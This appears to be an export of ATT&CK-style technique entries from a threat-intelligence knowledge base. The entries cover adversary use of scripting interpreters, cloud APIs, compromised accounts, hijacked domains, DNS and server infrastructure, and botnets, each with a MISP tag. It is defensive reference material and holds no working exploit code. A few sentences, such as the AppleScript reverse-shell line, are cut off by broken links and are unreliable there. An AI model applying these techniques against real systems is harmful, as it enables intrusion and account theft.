Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific objects from cloud storage. Similar to [File and Directory Discovery](https://app.tidalcyber.com/technique/1492c4ba-c933-47b8-953d-6de3db8cfce8) on a local host, after identifying available storage services (i.e. [Cloud Infrastructure Discovery](https://app.tidalcyber.com/technique/fd346e4e-b22f-4cae-bc24-946d7b14b5e1)) adversaries may access the contents/objects stored in cloud infrastructure.

Cloud service providers offer APIs allowing users to enumerate objects stored within cloud storage. Examples include ListObjectsV2 in AWS <sup>[[ListObjectsV2](https://app.tidalcyber.com/references/727c2077-f922-4314-908a-356c42564181)]</sup> and List Blobs in Azure<sup>[[List Blobs](https://app.tidalcyber.com/references/f9aa697a-83dd-4bae-bc11-006be51ce477)]</sup> .

The tag is: misp-galaxy:technique="Cloud Storage Object Discovery"

AppleScript

Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.<sup>[[Apple AppleScript](https://app.tidalcyber.com/references/b23abcb8-3004-4a42-8ada-58cdbd65e171)]</sup> These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.

Scripts can be run from the command-line via <code>osascript /path/to/script</code> or <code>osascript -e "script here"</code>. Aside from the command line, scripts can be executed in numerous ways including Mail rules, Calendar.app alarms, and Automator workflows. AppleScripts can also be executed as plain text shell scripts by adding <code>#!/usr/bin/osascript</code> to the start of the script file.<sup>[[SentinelOne AppleScript](https://app.tidalcyber.com/references/bb6aafcb-ed30-404a-a9d9-b90503a0ec7c)]</sup>

AppleScripts do not need to call <code>osascript</code> to execute. However, they may be executed from within mach-O binaries by using the macOS [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560)s <code>NSAppleScript</code> or <code>OSAScript</code>;, both of which execute code independent of the <code>/usr/bin/osascript</code> command line utility.

Adversaries may abuse AppleScript to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally), but they can interact with applications if they’re already running remotely. On macOS 10.10 Yosemite and higher, AppleScript has the ability to execute [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560)s, which otherwise would require compilation and execution in a mach-O binary file format.<sup>[[SentinelOne macOS Red Team](https://app.tidalcyber.com/references/4b05bd7c-22a3-4168-850c-8168700b17ba)]</sup> Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via [Python]([Macro Malware Targets Macs(https://app.tidalcyber.com/references/d63f3f6a-4486-48a4-b2f8-c2a8d571731a)]</sup>

The tag is: misp-galaxy:technique="AppleScript"

Cloud API

Adversaries may abuse cloud APIs to execute malicious commands. APIs available in cloud environments provide various functionalities and are a feature-rich method for programmatic access to nearly all aspects of a tenant. These APIs may be utilized through various methods such as command line interpreters (CLIs), in-browser Cloud Shells, [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) modules like Azure for PowerShell<sup>[[Microsoft - Azure PowerShell](https://app.tidalcyber.com/references/3b17b649-9efa-525f-aa49-cf6c9ad559d7)]</sup>, or software developer kits (SDKs) available for languages such as [Python](https://app.tidalcyber.com/technique/68fed1c9-e060-4c4d-83d9-d8c817893d65).

Cloud API functionality may allow for administrative access across all major services in a tenant such as compute, storage, identity and access management (IAM), networking, and security policies.

With proper permissions (often via use of credentials such as [Application Access Token](https://app.tidalcyber.com/technique/8592f37d-850a-43d1-86f2-cc981ad7d7dc) and [Web Session Cookie](https://app.tidalcyber.com/technique/d36a5323-e249-44e8-9c8b-5cc9c023a5e1)), adversaries may abuse cloud APIs to invoke various functions that execute malicious actions. For example, CLI and PowerShell functionality may be accessed through binaries installed on cloud-hosted or on-premises hosts or accessed through a browser-based cloud shell offered by many cloud platforms (such as AWS, Azure, and GCP). These cloud shells are often a packaged unified environment to use CLI and/or scripting modules hosted as a container in the cloud environment.

The tag is: misp-galaxy:technique="Cloud API"

JavaScript

Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.<sup>[[NodeJS](https://app.tidalcyber.com/references/af710d49-48f4-47f6-98c6-8d4a4568b020)]</sup>

JScript is the Microsoft implementation of the same scripting standard. JScript is interpreted via the Windows Script engine and thus integrated with many components of Windows such as the [Component Object Model](https://app.tidalcyber.com/technique/8bc683db-1311-476f-8cae-45f3f89dcc66) and Internet Explorer HTML Application (HTA) pages.<sup>[[JScrip May 2018](https://app.tidalcyber.com/references/99e48516-f918-477c-b85e-4ad894cc031f)]</sup><sup>[[Microsoft JScript 2007](https://app.tidalcyber.com/references/e3c97d0f-150e-4fe3-a4ce-fc146a2fa718)]</sup><sup>[[Microsoft Windows Scripts](https://app.tidalcyber.com/references/9e7cd4da-da18-4d20-809a-19abb4352807)]</sup>

JavaScript for Automation (JXA) is a macOS scripting language based on JavaScript, included as part of Apple’s Open Scripting Architecture (OSA), that was introduced in OSX 10.10. Apple’s OSA provides scripting capabilities to control applications, interface with the operating system, and bridge access into the rest of Apple’s internal APIs. As of OSX 10.10, OSA only supports two languages, JXA and [AppleScript](https://app.tidalcyber.com/technique/9f06ef9b-d587-41d3-8fc8-7d539dac5701). Scripts can be executed via the command line utility <code>osascript</code>, they can be compiled into applications or script files via <code>osacompile</code>, and they can be compiled and executed in memory of other programs by leveraging the OSAKit Framework.<sup>[[Apple About Mac Scripting 2016](https://app.tidalcyber.com/references/d2f32ac1-9b5b-408d-a7ab-d92dd9efe0ed)]</sup><sup>[[SpecterOps JXA 2020](https://app.tidalcyber.com/references/d9b6bb05-6ab4-4f5e-9ef0-f3e0cc97ce29)]</sup><sup>[[SentinelOne macOS Red Team](https://app.tidalcyber.com/references/4b05bd7c-22a3-4168-850c-8168700b17ba)]</sup><sup>[[Red Canary Silver Sparrow Feb2021](https://app.tidalcyber.com/references/f08a856d-6c3e-49e2-b7ba-399831c637e5)]</sup><sup>[[MDSec macOS JXA and VSCode](https://app.tidalcyber.com/references/979cac34-d447-4e42-b17e-8ab2630bcfec)]</sup>

Adversaries may abuse various implementations of JavaScript to execute various behaviors. Common uses include hosting malicious scripts on websites as part of a [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381) or downloading and executing these script files as secondary payloads. Since these payloads are text-based, it is also very common for adversaries to obfuscate their content as part of [Obfuscated Files or Information](https://app.tidalcyber.com/technique/046cc07e-8700-4536-9c5b-6ecb384f52b0).

The tag is: misp-galaxy:technique="JavaScript"

Network Device CLI

Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious command and payloads. The CLI is the primary means through which users and administrators interact with the device in order to view system information, modify device operations, or perform diagnostic and administrative functions. CLIs typically contain various permission levels required for different commands.

Scripting interpreters automate tasks and extend functionality beyond the command set included in the network OS. The CLI and scripting interpreter are accessible through a direct console connection, or through remote means, such as telnet or [SSH](https://app.tidalcyber.com/technique/7620ba3a-7877-4f87-90e3-588163ac0474).

Adversaries can use the network CLI to change how network devices behave and operate. The CLI may be used to manipulate traffic flows to intercept or manipulate data, modify startup configuration parameters to load malicious system software, or to disable security features or logging to avoid detection.<sup>[[Cisco Synful Knock Evolution](https://app.tidalcyber.com/references/29301297-8343-4f75-8096-7fe229812f75)]</sup>

The tag is: misp-galaxy:technique="Network Device CLI"

PowerShell

Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.<sup>[[TechNet PowerShell](https://app.tidalcyber.com/references/20ec94d1-4a5c-43f5-bb65-f3ea965d2b6e)]</sup> Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the <code>Start-Process</code> cmdlet which can be used to run an executable and the <code>Invoke-Command</code> cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).

PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.

PowerShell commands/scripts can also be executed without directly invoking the <code>powershell.exe</code> binary through interfaces to PowerShell’s underlying <code>System.Management.Automation</code> assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI).<sup>[[Sixdub PowerPick Jan 2016](https://app.tidalcyber.com/references/52190592-5809-4e7b-a19c-fc87b245025c)]</sup><sup>[[SilentBreak Offensive PS Dec 2015](https://app.tidalcyber.com/references/8eec1af3-c65e-4522-8087-73122ac6c281)]</sup><sup>[[Microsoft PSfromCsharp APR 2014](https://app.tidalcyber.com/references/83e346d5-1894-4c46-98eb-88a61ce7f003)]</sup>

The tag is: misp-galaxy:technique="PowerShell"

Python

Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the <code>python.exe</code> interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables.

Python comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors.

The tag is: misp-galaxy:technique="Python"

Unix Shell

Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.<sup>[[DieNet Bash](https://app.tidalcyber.com/references/c5b362ce-6bae-46f7-b047-e3a0b2bf2580)]</sup><sup>[[Apple ZShell](https://app.tidalcyber.com/references/5374ad8e-96a2-4d19-b2cf-28232fa97b52)]</sup> Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.

Unix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.

Adversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with [SSH](https://app.tidalcyber.com/technique/7620ba3a-7877-4f87-90e3-588163ac0474). Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence.

The tag is: misp-galaxy:technique="Unix Shell"

Visual Basic

Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://app.tidalcyber.com/technique/8bc683db-1311-476f-8cae-45f3f89dcc66) and the [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.<sup>[[VB .NET Mar 2020](https://app.tidalcyber.com/references/da6d1b56-8e59-4125-b318-48a40a1c8e94)]</sup><sup>[[VB Microsoft](https://app.tidalcyber.com/references/b23a1a5d-48dd-4346-bf8d-390624214081)]</sup>

Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.<sup>[[Microsoft VBA](https://app.tidalcyber.com/references/ba0e3c5d-7934-4ece-b4a1-c03bc355f378)]</sup><sup>[[Wikipedia VBA](https://app.tidalcyber.com/references/70818420-c3ec-46c3-9e97-d8f989f2e3db)]</sup> VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript](https://app.tidalcyber.com/technique/8a669da8-8894-4fb0-9124-c3c8418985cc) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).<sup>[[Microsoft VBScript](https://app.tidalcyber.com/references/5ea8d8c7-8039-4210-967a-a4dcd566bf95)]</sup>

Adversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://app.tidalcyber.com/technique/ba553ad4-5699-4458-ae4e-76e1faa43291) payloads (which may also involve [Mark-of-the-Web Bypass](https://app.tidalcyber.com/technique/7ee64e42-6d3b-47f8-a2a9-55263537bd51) to enable execution).<sup>[[Default VBS macros Blocking ](https://app.tidalcyber.com/references/d86883dd-3766-4971-91c7-b205ed13cc37)]</sup>

The tag is: misp-galaxy:technique="Visual Basic"

Windows Command Shell

Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1) such as [SSH]([SSH in Windows(https://app.tidalcyber.com/references/3006af23-b802-400f-841d-7eea7d748d28)]</sup>

Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems.

Adversaries may leverage [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) to execute various commands and payloads. Common uses include [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) to execute a single command, or abusing [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) interactively with input and output forwarded over a command and control channel.

The tag is: misp-galaxy:technique="Windows Command Shell"

Command and Scripting Interpreter

Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://app.tidalcyber.com/technique/3eafcd8b-0cb8-4d23-8785-3f80a3c897c7) while Windows installations include the [Windows Command Shell](https://app.tidalcyber.com/technique/be095bcc-4769-4010-b2db-3033d01efdbe) and [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde).

There are also cross-platform interpreters such as [Python](https://app.tidalcyber.com/technique/68fed1c9-e060-4c4d-83d9-d8c817893d65), as well as those commonly associated with client applications such as [JavaScript](https://app.tidalcyber.com/technique/8a669da8-8894-4fb0-9124-c3c8418985cc) and [Visual Basic](https://app.tidalcyber.com/technique/0340ed34-6db2-4979-bf73-2c16855867b4).

Adversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in [Initial Access](https://app.tidalcyber.com/tactics/586a5b49-c566-4a57-beb4-e7c667f9c34c) payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells, as well as utilize various [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1) in order to achieve remote Execution.<sup>[[Powershell Remote Commands](https://app.tidalcyber.com/references/24c526e1-7199-45ca-99b4-75e75c7041cd)]</sup><sup>[[Cisco IOS Software Integrity Assurance - Command History](https://app.tidalcyber.com/references/dbca06dd-1184-4d52-9ee8-b059e368033c)]</sup><sup>[[Remote Shell Execution in Python](https://app.tidalcyber.com/references/4ea54256-42f9-4b35-8f9e-e595ab9be9ce)]</sup>

The tag is: misp-galaxy:technique="Command and Scripting Interpreter"

Communication Through Removable Media

Adversaries can perform command and control between compromised hosts on potentially disconnected networks using removable media to transfer commands from system to system. Both systems would need to be compromised, with the likelihood that an Internet-connected system was compromised first and the second through lateral movement by [Replication Through Removable Media](https://app.tidalcyber.com/technique/6a7ab25e-49ed-4cd3-b199-5d80b728b416). Commands and files would be relayed from the disconnected system to the Internet-connected system to which the adversary has direct access.

The tag is: misp-galaxy:technique="Communication Through Removable Media"

Cloud Accounts - Duplicate2

Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://app.tidalcyber.com/technique/ce886c55-17ab-4c1c-90dc-3aa93e69bdb4) or to [Upload Tool](https://app.tidalcyber.com/technique/d7594eaf-286f-4484-94fa-8608c911767a)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://app.tidalcyber.com/technique/2c04d7c8-67a3-4b1a-bd71-47b7c5a54b23)s or [Serverless](https://app.tidalcyber.com/technique/c30faf84-496b-4f27-a4bc-aa36d583c69f) infrastructure. Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.<sup>[[Awake Security C2 Cloud](https://app.tidalcyber.com/references/fa3762ce-3e60-4991-b464-12601d2a6912)]</sup>

A variety of methods exist for compromising cloud accounts, such as gathering credentials via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06), purchasing credentials from third-party sites, conducting [Password Spraying](https://app.tidalcyber.com/technique/e63414a7-c6f7-4bcf-a6eb-25b0c4ddbb2a) attacks, or attempting to [Steal Application Access Token]([MSTIC Nobelium Oct 2021(https://app.tidalcyber.com/references/7b6cc308-9871-47e5-9039-a9a7e66ce373)]</sup> Prior to compromising cloud accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. In some cases, adversaries may target privileged service provider accounts with the intent of leveraging a [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf) between service providers and their customers.<sup>[[MSTIC Nobelium Oct 2021](https://app.tidalcyber.com/references/7b6cc308-9871-47e5-9039-a9a7e66ce373)]</sup>

The tag is: misp-galaxy:technique="Cloud Accounts - Duplicate2"

Email Accounts - Duplicate

Adversaries may compromise email accounts that can be used during targeting. Adversaries can use compromised email accounts to further their operations, such as leveraging them to conduct [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06), [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533), or large-scale spam email campaigns. Utilizing an existing persona with a compromised email account may engender a level of trust in a potential victim if they have a relationship with, or knowledge of, the compromised persona. Compromised email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://app.tidalcyber.com/technique/b9f5f6b7-ecff-48c8-a23e-c58fd9e41a0d)).

A variety of methods exist for compromising email accounts, such as gathering credentials via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06), purchasing credentials from third-party sites, brute forcing credentials (ex: password reuse from breach credential dumps), or paying employees, suppliers or business partners for access to credentials.<sup>[[AnonHBGary](https://app.tidalcyber.com/references/19ab02ea-883f-441c-bebf-4be64855374a)]</sup><sup>[[Microsoft DEV-0537](https://app.tidalcyber.com/references/2f7a59f3-620d-4e2e-8595-af96cd4e16c3)]</sup> Prior to compromising email accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. Adversaries may target compromising well-known email accounts or domains from which malicious spam or [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) emails may evade reputation-based email filtering rules.

Adversaries can use a compromised email account to hijack existing email threads with targets of interest.

The tag is: misp-galaxy:technique="Email Accounts - Duplicate"

Social Media Accounts - Duplicate

Adversaries may compromise social media accounts that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating social media profiles (i.e. [Social Media Accounts](https://app.tidalcyber.com/technique/fe0bf22c-efb2-4bc6-96d8-e0e909502fd7)), adversaries may compromise existing social media accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona.

A variety of methods exist for compromising social media accounts, such as gathering credentials via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).<sup>[[AnonHBGary](https://app.tidalcyber.com/references/19ab02ea-883f-441c-bebf-4be64855374a)]</sup> Prior to compromising social media accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.

Personas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Compromised social media accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.

Adversaries can use a compromised social media profile to create new, or hijack existing, connections to targets of interest. These connections may be direct or may include trying to connect through others.<sup>[[NEWSCASTER2014](https://app.tidalcyber.com/references/9abb4bbb-bad3-4d22-b235-c8a35465f2ce)]</sup><sup>[[BlackHatRobinSage](https://app.tidalcyber.com/references/82068e93-a3f8-4d05-9358-6fe76a0055bb)]</sup> Compromised profiles may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://app.tidalcyber.com/technique/165ba336-3eab-4809-b6fd-d0dcc5478f7f)).

The tag is: misp-galaxy:technique="Social Media Accounts - Duplicate"

Compromise Accounts

Adversaries may compromise accounts with services that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating accounts (i.e. [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4)), adversaries may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona.

A variety of methods exist for compromising accounts, such as gathering credentials via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06), purchasing credentials from third-party sites, brute forcing credentials (ex: password reuse from breach credential dumps), or paying employees, suppliers or business partners for access to credentials.<sup>[[AnonHBGary](https://app.tidalcyber.com/references/19ab02ea-883f-441c-bebf-4be64855374a)]</sup><sup>[[Microsoft DEV-0537](https://app.tidalcyber.com/references/2f7a59f3-620d-4e2e-8595-af96cd4e16c3)]</sup> Prior to compromising accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.

Personas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, etc.). Compromised accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.

Adversaries may directly leverage compromised email accounts for [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533).

The tag is: misp-galaxy:technique="Compromise Accounts"

Compromise Client Software Binary

Adversaries may modify client software binaries to establish persistent access to systems. Client software enables users to access services provided by a server. Common client software types are SSH clients, FTP clients, email clients, and web browsers.

Adversaries may make modifications to client software binaries to carry out malicious tasks when those applications are in use. For example, an adversary may copy source code for the client software, add a backdoor, compile for the target, and replace the legitimate application binary (or support files) with the backdoored one. An adversary may also modify an existing binary by patching in malicious functionality (e.g., IAT Hooking/Entry point patching)<sup>[[Unit42 Banking Trojans Hooking 2022](https://app.tidalcyber.com/references/411c3df4-08e6-518a-953d-19988b663dc4)]</sup> prior to the binary’s legitimate execution. For example, an adversary may modify the entry point of a binary to point to malicious code patched in by the adversary before resuming normal execution flow.<sup>[[ESET FontOnLake Analysis 2021](https://app.tidalcyber.com/references/dbcced87-91ee-514f-98c8-29a85d967384)]</sup>

Since these applications may be routinely executed by the user, the adversary can leverage this for persistent access to the host.

The tag is: misp-galaxy:technique="Compromise Client Software Binary"

Botnet

Adversaries may compromise numerous third-party systems to form a botnet that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.<sup>[[Norton Botnet](https://app.tidalcyber.com/references/f97427f1-ea16-4e92-a4a2-4d62a800df15)]</sup> Instead of purchasing/renting a botnet from a booter/stresser service, adversaries may build their own botnet by compromising numerous third-party systems.<sup>[[Imperva DDoS for Hire](https://app.tidalcyber.com/references/86f87ec6-058e-45a7-9314-0579a2b4e8f2)]</sup> Adversaries may also conduct a takeover of an existing botnet, such as redirecting bots to adversary-controlled C2 servers.<sup>[[Dell Dridex Oct 2015](https://app.tidalcyber.com/references/f81ce947-d875-4631-9709-b54c8b5d25bc)]</sup> With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) or Distributed Denial of Service (DDoS).

The tag is: misp-galaxy:technique="Botnet"

DNS Server - Duplicate

Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://app.tidalcyber.com/technique/8a7afe43-b814-41b3-8bd8-e1301b8ba5b4)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.

By compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization’s traffic, facilitating Collection and Credential Access efforts for the adversary.<sup>[[Talos DNSpionage Nov 2018](https://app.tidalcyber.com/references/d597ad7d-f808-4289-b42a-79807248c2d6)]</sup><sup>[[FireEye DNS Hijack 2019](https://app.tidalcyber.com/references/2c696e90-11eb-4196-9946-b5c4c11ccddc)]</sup> Additionally, adversaries may leverage such control in conjunction with [Digital Certificates](https://app.tidalcyber.com/technique/4c0db4e5-14e0-4fb7-88b0-bb391ce5ad58) to redirect traffic to adversary-controlled infrastructure, mimicking normal trusted network communications.<sup>[[FireEye DNS Hijack 2019](https://app.tidalcyber.com/references/2c696e90-11eb-4196-9946-b5c4c11ccddc)]</sup><sup>[[Crowdstrike DNS Hijack 2019](https://app.tidalcyber.com/references/969ad6de-9415-464d-ba52-2e61e1814a92)]</sup> Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.<sup>[[CiscoAngler](https://app.tidalcyber.com/references/0b10d7d4-9c18-4fd8-933a-b46e41d618ab)]</sup><sup>[[Proofpoint Domain Shadowing](https://app.tidalcyber.com/references/4653a9a5-95f1-4b02-9bf0-8f1b8cd6c059)]</sup>

The tag is: misp-galaxy:technique="DNS Server - Duplicate"

Domains

Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.<sup>[[ICANNDomainNameHijacking](https://app.tidalcyber.com/references/96c5ec6c-d53d-49c3-bca1-0b6abe0080e6)]</sup> Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.<sup>[[Krebs DNS Hijack 2019](https://app.tidalcyber.com/references/9bdc618d-ff55-4ac8-8967-6039c6c24cb1)]</sup>

Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.<sup>[[Microsoft Sub Takeover 2020](https://app.tidalcyber.com/references/b8005a55-7e77-4dc1-abed-f75a0a3d8afb)]</sup>

Adversaries who compromise a domain may also engage in domain shadowing by creating malicious subdomains under their control while keeping any existing DNS records. As service will not be disrupted, the malicious subdomains may go unnoticed for long periods of time.<sup>[[Palo Alto Unit 42 Domain Shadowing 2022](https://app.tidalcyber.com/references/ec460017-fd25-5975-b697-c8c11fee960d)]</sup>

The tag is: misp-galaxy:technique="Domains"

Server

Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of purchasing a [Server](https://app.tidalcyber.com/technique/6e4a0960-dcdc-4e42-9aa1-70d6fc3677b2) or [Virtual Private Server](https://app.tidalcyber.com/technique/2c04d7c8-67a3-4b1a-bd71-47b7c5a54b23), adversaries may compromise third-party servers in support of operations.

Adversaries may also compromise web servers to support watering hole operations, as in [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381), or email servers to support [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) operations.

The tag is: misp-galaxy:technique="Server"

Serverless

Adversaries may compromise serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.

Once compromised, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://app.tidalcyber.com/technique/ba6a869a-c870-4be6-bc08-e078f0efdc3b) traffic to an adversary-owned command and control server.<sup>[[BlackWater Malware Cloudflare Workers](https://app.tidalcyber.com/references/053895e8-da3f-4291-a728-2198fde774e7)]</sup><sup>[[AWS Lambda Redirector](https://app.tidalcyber.com/references/9ba87a5d-a140-4959-9905-c4a80e684d56)]</sup> As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.<sup>[[Detecting Command & Control in the Cloud](https://app.tidalcyber.com/references/b12e0288-48cd-46ec-8305-0f4d050782f2)]</sup><sup>[[BlackWater Malware Cloudflare Workers](https://app.tidalcyber.com/references/053895e8-da3f-4291-a728-2198fde774e7)]</sup>

The tag is: misp-galaxy:technique="Serverless"

Virtual Private Server

Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.<sup>[[NSA NCSC Turla OilRig](https://app.tidalcyber.com/references/3e86a807-5188-4278-9a58-babd23b86410)]</sup>

Compromising a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers as well as that added by the compromised third-party.

The tag is: misp-galaxy:technique="Virtual Private Server"

Web Services

